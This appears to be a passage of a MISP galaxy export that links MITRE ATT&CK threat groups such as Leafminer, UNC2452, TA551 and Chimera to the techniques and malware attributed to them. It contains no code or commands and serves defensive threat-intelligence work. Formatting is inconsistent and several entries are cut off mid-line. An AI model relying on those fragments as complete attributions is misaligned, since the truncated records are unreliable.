- uses: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-
- uses: misp-galaxy:mitre-tool="Koadic - S0250" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="SHARPSTATS - S0450" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="CrackMapExec - S0488" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Out1 - S0594" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-
Leafminer - G0077

[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Leafminer - G0077"`

Leafminer - G0077 is also known as:

- Leafminer
- Raspite

Leafminer - G0077 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="MailSniper - S0413" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 4375. Table References

Links

https://attack.mitre.org/groups/G0077
DarkHydrus - G0079

[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)

The tag is: `misp-galaxy:mitre-intrusion-set="DarkHydrus - G0079"

DarkHydrus - G0079 is also known as:

- DarkHydrus

DarkHydrus - G0079 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="Cobalt Strike - S0154"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0079">https://attack.mitre.org/groups/G0079</a></td>
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BlackTech - G0098

[BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017)

The tag is: misp-galaxy:mitre-intrusion-set="BlackTech - G0098"

BlackTech - G0098 is also known as:

- BlackTech

BlackTech - G0098 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="TSCookie - S0436" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="PLEAD - S0435" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Waterbear - S0579" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0098">https://attack.mitre.org/groups/G0098</a></td>
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UNC2452 - G0118

The tag is: misp-galaxy:mitre-intrusion-set="UNC2452 - G0118"

UNC2452 - G0118 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="SUNBURST - S0559" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="TEARDROP - S0560" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="SUNSPOT - S0562" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="Raindrop - S0565" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="GoldMax - S0588" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="Sibot - S0589" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"

revoked-by: misp-galaxy:mitre-intrusion-set="APT29 - G0016" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/groups/G0118">https://attack.mitre.org/groups/G0118</a></td>
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<td><a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/">https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/</a></td>
</tr>
</tbody>
</table>

**TA551 - G0127**

[TA551](https://attack.mitre.org/groups/G0127) is a financially-motivated threat group that has been active since at least 2018. (Citation: Secureworks GOLD CABIN) The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. (Citation: Unit 42 TA551 Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TA551 - G0127"

TA551 - G0127 is also known as:

- TA551
- GOLD CABIN
- Shathak
TA551 - G0127 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="IcedID - S0483" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Valak - S0476" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Ursnif - S0386" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0127">https://attack.mitre.org/groups/G0127</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-cabin">https://www.secureworks.com/research/threat-profiles/gold-cabin</a></td>
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Sidewinder - G0121

[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan. (Citation: ATT Sidewinder January 2021) (Citation: Securelist APT Trends April 2018) (Citation: Cyble Sidewinder September 2020)

The tag is: `misp-galaxy:mitre-intrusion-set="Sidewinder - G0121"`

Sidewinder - G0121 is also known as:

- Sidewinder
- T-APT-04
- Rattlesnake

Sidewinder - G0121 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="Koadic - S0250"` with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

*Table 4380. Table References*
Windshift - G0112

[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East. (Citation: SANS Windshift August 2018) (Citation: objective-see windtail1 dec 2018) (Citation: objective-see windtail2 jan 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="Windshift - G0112"`

Windshift - G0112 is also known as:

- Windshift
- Bahamut

Windshift - G0112 has relationships with:

- uses: `misp-galaxy:mitre-malware="WindTail - S0466"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Masquerading - T1036"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"`
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Geofencing - T1581" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

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**Chimera - G0114**

[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)

The tag is: *misp-galaxy:mitre-intrusion-set="Chimera - G0114”*

Chimera - G0114 is also known as:

• Chimera

Chimera - G0114 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="BloodHound - S0521" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
Windigo - G0124

The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)

The tag is: *misp-galaxy:mitre-intrusion-set="Windigo - G0124"*

Windigo - G0124 is also known as:

- Windigo

Windigo - G0124 has relationships with:

- uses: *misp-galaxy:mitre-malware="Ebury - S0377"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Software Discovery - T1518"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"* with estimative-language:likelihood-probability="almost-certain"
HAFNIUM - G0125

